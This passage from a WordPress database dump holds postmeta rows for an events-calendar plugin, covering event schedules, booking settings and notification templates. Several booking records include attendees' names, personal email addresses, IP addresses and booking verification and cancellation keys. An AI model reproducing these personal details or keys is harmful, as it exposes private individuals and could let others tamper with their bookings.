repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(178787,268181,'mec_certain_weekdays','a:0:{}'),(178788,268181,'mec_allday','0'),(178789,268181,'one_occurrence','0'),(178790,268181,'mec_hide_time','0'),(178791,268181,'mec_hide_end_time','0'),(178792,268181,'mec_comment',''),(178793,268181,'mec_timezone','global'),(178794,268181,'mec_countdown_method','global'),(178795,268181,'mec_public','1'),(178796,268181,'mec_start_date','2023-04-23'),(178797,268181,'mec_start_time_hour','4'),(178798,268181,'mec_start_time_minutes','0'),(178799,268181,'mec_start_time_ampm','PM'),(178800,268181,'mec_start_day_seconds','57600'),(178801,268181,'mec_end_date','2023-04-23'),(178802,268181,'mec_end_time_hour','5'),(178803,268181,'mec_end_time_minutes','30'),(178804,268181,'mec_end_time_ampm','PM'),(178805,268181,'mec_end_day_seconds','63000'),(178806,268181,'mec_repeat_status','0'),(178807,268181,'mec_repeat_type',''),(178808,268181,'mec_repeat_interval','1'),(178809,268181,'mec_repeat_end',''),(178810,268181,'mec_repeat_end_at_occurrences',''),(178811,268181,'mec_repeat_end_at_date',''),(178812,268181,'mec_advanced_days','a:0:{}'),(178813,268181,'mec_in_days',''),(178814,268181,'mec_not_in_days',''),(178815,268181,'mec_hourly_schedules','a:0:{}'),(178816,268181,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(178817,268181,'mec_tickets','a:0:{}'),(178818,268181,'mec_fees_global_inheritance','1'),(178819,268181,'mec_fees','a:0:{}'),(178820,268181,'mec_ticket_variations_global_inheritance','1'),(178821,268181,'mec_ticket_variations','a:0:{}'),(178822,268181,'mec_reg_fields_global_inheritance','1'),(178823,268181,'mec_reg_fields','a:0:{}'),(178824,268181,'mec_bfixed_fields','a:0:{}'),(178825,268181,'mec_op','a:0:{}'),(178826,268181,'mec_fields','a:0:{}'),(178827,268181,'mec_event_status','EventScheduled'),(178828,268181,'mec_moved_online_link',''),(178829,268181,'mec_cancelled_reason',''),(178830,268181,'mec_display_cancellation_reason_in_single_page',''),(178831,268181,'boldgrid_hide_page_title','0'),(178832,268181,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(178833,268181,'passster_activate_global_protection',NULL),(178834,268181,'passster_activate_protection',NULL),(178835,268181,'passster_protection_type','password'),(178836,268181,'boldgrid_in_page_containers','1'),(178837,268181,'passster_area_shortcode',''),(178838,268181,'_thumbnail_id','266373'),(178840,268181,'_dp_original','268178'),(178841,268181,'_edit_lock','1681921972:2'),(178842,268181,'_edit_last','2'),(178843,268180,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2023/03/GoldenWorldPerson.webp - cannot be optimized, it has an invalid file type'),(178844,268180,'smush-complete',''),(178845,268172,'original-file','2023/03/dreaming-3-updraft-pre-smush-original.jpg'),(178846,268172,'smush-complete','1'),(178847,268172,'smush-info','The file was compressed from 80.18 KB to 77.54 KB saving 3.3 percent using WP-Optimize'),(178848,268172,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:82106;s:12:\"smushed-size\";i:79399;s:15:\"savings-percent\";d:3.3;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:82106;s:10:\"compressed\";i:79399;}s:6:\"medium\";a:2:{s:8:\"original\";i:14139;s:10:\"compressed\";i:14110;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6569;s:10:\"compressed\";i:6503;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:65502;s:10:\"compressed\";i:64949;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20621;s:10:\"compressed\";i:20542;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:34814;s:10:\"compressed\";i:34413;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24554;s:10:\"compressed\";i:24295;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24675;s:10:\"compressed\";i:24611;}}}'),(178849,268182,'mec_transaction_id','WNA72525'),(178850,268182,'mec_user_id','1000073'),(178851,268182,'mec_verified','1'),(178852,268182,'mec_verification_key','25b4d04d1be9541d214329a901dc74e4'),(178853,268182,'mec_cancellation_key','c86fb08e157278ef9e932396cc7a6b66'),(178854,268182,'mec_confirmed','1'),(178855,268182,'mec_event_id','268027'),(178856,268182,'mec_date','1678617000:1678663800'),(178857,268182,'mec_ticket_id',',1,'),(178858,268182,'mec_booking_time','2023-03-10 07:42:00'),(178859,268182,'mec_all_dates','a:0:{}'),(178860,268182,'mec_other_dates','a:0:{}'),(178861,268182,'mec_attention_time','1678617000:1678663800'),(178862,268182,'mec_attention_time_start','1678617000'),(178863,268182,'mec_attention_time_end','1678663800'),(178864,268182,'mec_book_date_submit','20230310074200'),(178865,268182,'mec_booking_location','129'),(178866,268182,'mec_ticket_price_1','0'),(178867,268182,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"gai.lawson@gmail.com\";s:4:\"name\";s:10:\"Gai Lawson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"108.180.175.87\";}}'),(178868,268182,'mec_price','0'),(178869,268182,'mec_gateway','MEC_gateway_free'),(178870,268182,'mec_gateway_label','Free'),(178871,268183,'mec_transaction_id','SUN77604'),(178872,268183,'mec_user_id','1000012'),(178873,268183,'mec_verified','1'),(178874,268183,'mec_verification_key','1a9ec79fb0f5df4756f4b3bd1f6a6be8'),(178875,268183,'mec_cancellation_key','bda057bf44dbdc306ddf0801a92fe0f4'),(178876,268183,'mec_confirmed','1'),(178877,268183,'mec_event_id','268027'),(178878,268183,'mec_date','1678617000:1678663800'),(178879,268183,'mec_ticket_id',',1,'),(178880,268183,'mec_booking_time','2023-03-10 10:28:26'),(178881,268183,'mec_all_dates','a:0:{}'),(178882,268183,'mec_other_dates','a:0:{}'),(178883,268183,'mec_attention_time','1678617000:1678663800'),(178884,268183,'mec_attention_time_start','1678617000'),(178885,268183,'mec_attention_time_end','1678663800'),(178886,268183,'mec_book_date_submit','20230310102826'),(178887,268183,'mec_booking_location','129'),(178888,268183,'mec_ticket_price_1','0'),(178889,268183,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"65.130.58.60\";}}'),(178890,268183,'mec_price','0'),(178891,268183,'mec_gateway','MEC_gateway_free'),(178892,268183,'mec_gateway_label','Free'),(178899,268184,'mec_event_id','268027'),(178900,268184,'mec_date','1678617000:1678663800'),(178901,268184,'mec_ticket_id',',1,'),(178902,268184,'mec_booking_time','2023-03-10 18:14:18'),(178903,268184,'mec_all_dates','a:0:{}'),(178904,268184,'mec_other_dates','a:0:{}'),(178905,268184,'mec_attention_time','1678617000:1678663800'),(178906,268184,'mec_attention_time_start','1678617000'),(178907,268184,'mec_attention_time_end','1678663800'),(178908,268184,'mec_book_date_submit','20230310181418'),(178909,268184,'mec_booking_location','129'),(178910,268184,'mec_ticket_price_1','0'),(178911,268184,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:6:\"Joanne\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"174.216.24.207\";}}'),(178912,268184,'mec_price','0'),(178913,268184,'mec_gateway','MEC_gateway_free'),(178914,268184,'mec_gateway_label','Free'),(178915,268185,'mec_transaction_id','OXD16051'),(178916,268185,'mec_user_id','1000044'),(178917,268185,'mec_verified','1'),(178918,268185,'mec_verification_key','ec35bc96470baa322760a49a4bf2b429'),(178919,268185,'mec_cancellation_key','5120879ddb25f46454acc38e692d61e7'),(178920,268185,'mec_confirmed','1'),(178921,268185,'mec_event_id','268027'),(178922,268185,'mec_date','1678617000:1678663800'),(178923,268185,'mec_ticket_id',',1,'),(178924,268185,'mec_booking_time','2023-03-11 13:06:14'),(178925,268185,'mec_all_dates','a:0:{}'),(178926,268185,'mec_other_dates','a:0:{}'),(178927,268185,'mec_attention_time','1678617000:1678663800'),(178928,268185,'mec_attention_time_start','1678617000'),(178929,268185,'mec_attention_time_end','1678663800'),(178930,268185,'mec_book_date_submit','20230311130614'),(178931,268185,'mec_booking_location','129'),(178932,268185,'mec_ticket_price_1','0'),(178933,268185,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"208.93.179.43\";}}'),(178934,268185,'mec_price','0'),(178935,268185,'mec_gateway','MEC_gateway_free'),(178936,268185,'mec_gateway_label','Free'),(178937,268186,'mec_transaction_id','TOH14609'),(178938,268186,'mec_user_id','1000048'),(178939,268186,'mec_verified','1'),(178940,268186,'mec_verification_key','fc8d53f87cafd58f74e3aaf7cb3961af'),(178941,268186,'mec_cancellation_key','7cfceb1a66b2804ee86c685f143ba30b'),(178942,268186,'mec_confirmed','1'),(178943,268186,'mec_event_id','268027'),(178944,268186,'mec_date','1678617000:1678663800'),(178945,268186,'mec_ticket_id',',1,'),(178946,268186,'mec_booking_time','2023-03-12 05:55:16'),(178947,268186,'mec_all_dates','a:0:{}'),(178948,268186,'mec_other_dates','a:0:{}'),(178949,268186,'mec_attention_time','1678617000:1678663800'),(178950,268186,'mec_attention_time_start','1678617000'),(178951,268186,'mec_attention_time_end','1678663800'),(178952,268186,'mec_book_date_submit','20230312055516'),(178953,268186,'mec_booking_location','129'),(178954,268186,'mec_ticket_price_1','0'),(178955,268186,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"rhoann9@gmail.com\";s:4:\"name\";s:13:\"Rhonda Miller\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"73.14.13.119\";}}'),(178956,268186,'mec_price','0'),(178957,268186,'mec_gateway','MEC_gateway_free'),(178958,268186,'mec_gateway_label','Free'),(178959,268187,'mec_transaction_id','AZK42289'),(178960,268187,'mec_user_id','1000061'),(178961,268187,'mec_verified','1'),(178962,268187,'mec_verification_key','bc9a5474b48decd6aac92d233c20f5d4'),(178963,268187,'mec_cancellation_key','54dba61de92e2696488ee71880e3ddc3'),(178964,268187,'mec_confirmed','1'),(178965,268187,'mec_event_id','268027'),(178966,268187,'mec_date','1678617000:1678663800'),(178967,268187,'mec_ticket_id',',1,'),(178968,268187,'mec_booking_time','2023-03-12 07:30:33'),(178969,268187,'mec_all_dates','a:0:{}'),(178970,268187,'mec_other_dates','a:0:{}'),(178971,268187,'mec_attention_time','1678617000:1678663800'),(178972,268187,'mec_attention_time_start','1678617000'),(178973,268187,'mec_attention_time_end','1678663800'),(178974,268187,'mec_book_date_submit','20230312073033'),(178975,268187,'mec_booking_location','129'),(178976,268187,'mec_ticket_price_1','0'),(178977,268187,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:11:\"Chukwuebuka\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"24.8.224.150\";}}'),(178978,268187,'mec_price','0'),(178979,268187,'mec_gateway','MEC_gateway_free'),(178980,268187,'mec_gateway_label','Free'),(178981,268188,'mec_transaction_id','GHT23161'),(178982,268188,'mec_user_id','1000074'),(178983,268188,'mec_verified','1'),(178984,268188,'mec_verification_key','95a02c9d9b7ee0dab796ac2ac5240d24'),(178985,268188,'mec_cancellation_key','86a2fdc422567ea3557c2fa46502bf64'),(178986,268188,'mec_confirmed','1'),(178987,268188,'mec_event_id','268027'),(178988,268188,'mec_date','1678617000:1678663800'),(178989,268188,'mec_ticket_id',',1,'),(178990,268188,'mec_booking_time','2023-03-12 09:38:35'),(178991,268188,'mec_all_dates','a:0:{}'),(178992,268188,'mec_other_dates','a:0:{}'),(178993,268188,'mec_attention_time','1678617000:1678663800'),(178994,268188,'mec_attention_time_start','1678617000'),(178995,268188,'mec_attention_time_end','1678663800'),(178996,268188,'mec_book_date_submit','20230312093836'),(178997,268188,'mec_booking_location','129'),(178998,268188,'mec_ticket_price_1','0'),(178999,268188,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:29:\"lifedreamssolutions@gmail.com\";s:4:\"name\";s:7:\"Jessica\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"70.68.68.131\";}}'),(179000,268188,'mec_price','0'),(179001,268188,'mec_gateway','MEC_gateway_free'),(179002,268188,'mec_gateway_label','Free'),(179003,268189,'mec_transaction_id','JMG89836'),(179004,268189,'mec_user_id','1000075'),(179005,268189,'mec_verified','1'),(179006,268189,'mec_verification_key','fe3081ac39debdd5a3a3e1038acb7be1'),(179007,268189,'mec_cancellation_key','3fc00d0941daa7154c33ff986cd36bc3'),(179008,268189,'mec_confirmed','1'),(179009,268189,'mec_event_id','268027'),(179010,268189,'mec_date','1678617000:1678663800'),(179011,268189,'mec_ticket_id',',1,'),(179012,268189,'mec_booking_time','2023-03-12 10:02:02'),(179013,268189,'mec_all_dates','a:0:{}'),(179014,268189,'mec_other_dates','a:0:{}'),(179015,268189,'mec_attention_time','1678617000:1678663800'),(179016,268189,'mec_attention_time_start','1678617000'),(179017,268189,'mec_attention_time_end','1678663800'),(179018,268189,'mec_book_date_submit','20230312100202'),(179019,268189,'mec_booking_location','129'),(179020,268189,'mec_ticket_price_1','0'),(179021,268189,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:26:\"lifedreamsvision@gmail.com\";s:4:\"name\";s:20:\"Darlene  Montgomery \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"24.114.67.236\";}}'),(179022,268189,'mec_price','0'),(179023,268189,'mec_gateway','MEC_gateway_free'),(179024,268189,'mec_gateway_label','Free'),(179025,268190,'mec_transaction_id','SLK33746'),(179026,268190,'mec_user_id','1000076'),(179027,268190,'mec_verified','1'),(179028,268190,'mec_verification_key','1532229baa328706d0e9e793fae04e16'),(179029,268190,'mec_cancellation_key','25eed1929d705101b0e1a6d2d749e980'),(179030,268190,'mec_confirmed','1'),(179031,268190,'mec_event_id','268027'),(179032,268190,'mec_date','1678617000:1678663800'),(179033,268190,'mec_ticket_id',',1,'),(179034,268190,'mec_booking_time','2023-03-12 10:29:59'),(179035,268190,'mec_all_dates','a:0:{}'),(179036,268190,'mec_other_dates','a:0:{}'),(179037,268190,'mec_attention_time','1678617000:1678663800'),(179038,268190,'mec_attention_time_start','1678617000'),(179039,268190,'mec_attention_time_end','1678663800'),(179040,268190,'mec_book_date_submit','20230312102959'),(179041,268190,'mec_booking_location','129'),(179042,268190,'mec_ticket_price_1','0'),(179043,268190,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:31:\"shannon.everett2018@outlook.com\";s:4:\"name\";s:15:\"Shannon Everett\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"174.51.73.180\";}}'),(179044,268190,'mec_price','0'),(179045,268190,'mec_gateway','MEC_gateway_free'),(179046,268190,'mec_gateway_label','Free'),(179047,268191,'mec_transaction_id','PNU33974'),(179048,268191,'mec_user_id','1000071'),(179049,268191,'mec_verified','1'),(179050,268191,'mec_verification_key','6231aabd5b3e3a39d23720455460d930'),(179051,268191,'mec_cancellation_key','b6af55032fee1c5582ab4da8f6a565a8'),(179052,268191,'mec_confirmed','1'),(179053,268191,'mec_event_id','268027'),(179054,268191,'mec_date','1678617000:1678663800'),(179055,268191,'mec_ticket_id',',1,'),(179056,268191,'mec_booking_time','2023-03-12 10:34:29'),(179057,268191,'mec_all_dates','a:0:{}'),(179058,268191,'mec_other_dates','a:0:{}'),(179059,268191,'mec_attention_time','1678617000:1678663800'),(179060,268191,'mec_attention_time_start','1678617000'),(179061,268191,'mec_attention_time_end','1678663800'),(179062,268191,'mec_book_date_submit','20230312103429'),(179063,268191,'mec_booking_location','129'),(179064,268191,'mec_ticket_price_1','0'),(179065,268191,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"elainedahl@yahoo.com\";s:4:\"name\";s:15:\"Elaine Dahlgren\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"97.117.79.4\";}}'),(179066,268191,'mec_price','0'),(179067,268191,'mec_gateway','MEC_gateway_free'),(179068,268191,'mec_gateway_label','Free'),(179083,268193,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179084,268193,'mec_certain_weekdays','a:0:{}'),(179085,268193,'mec_allday','0'),(179086,268193,'one_occurrence','0'),(179087,268193,'mec_hide_time','0'),(179088,268193,'mec_hide_end_time','0'),(179089,268193,'mec_comment',''),(179090,268193,'mec_timezone','global'),(179091,268193,'mec_countdown_method','global'),(179092,268193,'mec_public','1'),(179093,268193,'mec_start_date','2023-04-13'),(179094,268193,'mec_start_time_hour','7'),(179095,268193,'mec_start_time_minutes','0'),(179096,268193,'mec_start_time_ampm','PM'),(179097,268193,'mec_start_day_seconds','68400'),(179098,268193,'mec_end_date','2023-04-13'),(179099,268193,'mec_end_time_hour','8'),(179100,268193,'mec_end_time_minutes','0'),(179101,268193,'mec_end_time_ampm','PM'),(179102,268193,'mec_end_day_seconds','72000'),(179103,268193,'mec_repeat_status','0'),(179104,268193,'mec_repeat_type',''),(179105,268193,'mec_repeat_interval','1'),(179106,268193,'mec_repeat_end',''),(179107,268193,'mec_repeat_end_at_occurrences',''),(179108,268193,'mec_repeat_end_at_date',''),(179109,268193,'mec_advanced_days','a:0:{}'),(179110,268193,'mec_in_days',''),(179111,268193,'mec_not_in_days',''),(179112,268193,'mec_hourly_schedules','a:0:{}'),(179113,268193,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(179114,268193,'mec_tickets','a:0:{}'),(179115,268193,'mec_fees_global_inheritance','1'),(179116,268193,'mec_fees','a:0:{}'),(179117,268193,'mec_ticket_variations_global_inheritance','1'),(179118,268193,'mec_ticket_variations','a:0:{}'),(179119,268193,'mec_reg_fields_global_inheritance','1'),(179120,268193,'mec_reg_fields','a:0:{}'),(179121,268193,'mec_bfixed_fields','a:0:{}'),(179122,268193,'mec_op','a:0:{}'),(179123,268193,'mec_fields','a:0:{}'),(179124,268193,'mec_event_status','EventScheduled'),(179125,268193,'mec_moved_online_link',''),(179126,268193,'mec_cancelled_reason',''),(179127,268193,'mec_display_cancellation_reason_in_single_page',''),(179128,268193,'boldgrid_hide_page_title','0'),(179129,268193,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(179130,268193,'passster_activate_global_protection',NULL),(179131,268193,'passster_activate_protection',NULL),(179132,268193,'passster_protection_type','password'),(179133,268193,'boldgrid_in_page_containers','1'),(179134,268193,'passster_area_shortcode',''),(179135,268193,'_thumbnail_id','268194'),(179137,268193,'_dp_original','268178'),(179138,268193,'_edit_lock','1678888616:15'),(179139,268193,'_edit_last','15'),(179140,268194,'_wp_attached_file','2023/03/Bench.webp'),(179141,268194,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:337;s:4:\"file\";s:18:\"2023/03/Bench.webp\";s:8:\"filesize\";i:46176;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"Bench-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18618;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"Bench-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9406;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:18:\"Bench-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:23308;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:18:\"Bench-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:36554;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:18:\"Bench-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:28740;}s:8:\"tileview\";a:5:{s:4:\"file\";s:18:\"Bench-300x337.webp\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:28488;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179142,268195,'protect_children',''),(179143,268195,'mec_color',''),(179144,268195,'mec_location_id','122'),(179145,268195,'mec_dont_show_map','0'),(179146,268195,'mec_organizer_id','1'),(179147,268195,'mec_read_more',''),(179148,268195,'mec_more_info',''),(179149,268195,'mec_more_info_title',''),(179150,268195,'mec_more_info_target','_self'),(179151,268195,'mec_cost',''),(179152,268195,'mec_currency','a:0:{}'),(179153,268195,'mec_additional_organizer_ids','a:0:{}'),(179154,268195,'mec_additional_location_ids','a:0:{}'),(179155,268195,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-02\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-02\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179156,268195,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179157,268195,'mec_certain_weekdays','a:0:{}'),(179158,268195,'mec_allday','0'),(179159,268195,'one_occurrence','0'),(179160,268195,'mec_hide_time','0'),(179161,268195,'mec_hide_end_time','0'),(179162,268195,'mec_comment',''),(179163,268195,'mec_timezone','global'),(179164,268195,'mec_countdown_method','global'),(179165,268195,'mec_public','1'),(179166,268195,'mec_start_date','2023-04-02'),(179167,268195,'mec_start_time_hour','10'),(179168,268195,'mec_start_time_minutes','30'),(179169,268195,'mec_start_time_ampm','AM'),(179170,268195,'mec_start_day_seconds','37800'),(179171,268195,'mec_end_date','2023-04-02'),(179172,268195,'mec_end_time_hour','11'),(179173,268195,'mec_end_time_minutes','30'),(179174,268195,'mec_end_time_ampm','AM'),(179175,268195,'mec_end_day_seconds','41400'),(179176,268195,'mec_repeat_status','0'),(179177,268195,'mec_repeat_type',''),(179178,268195,'mec_repeat_interval','1'),(179179,268195,'mec_repeat_end',''),(179180,268195,'mec_repeat_end_at_occurrences',''),(179181,268195,'mec_repeat_end_at_date',''),(179182,268195,'mec_advanced_days','a:0:{}'),(179183,268195,'mec_in_days',''),(179184,268195,'mec_not_in_days',''),(179185,268195,'mec_hourly_schedules','a:0:{}'),(179186,268195,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(179187,268195,'mec_tickets','a:0:{}'),(179188,268195,'mec_fees_global_inheritance','1'),(179189,268195,'mec_fees','a:0:{}'),(179190,268195,'mec_ticket_variations_global_inheritance','1'),(179191,268195,'m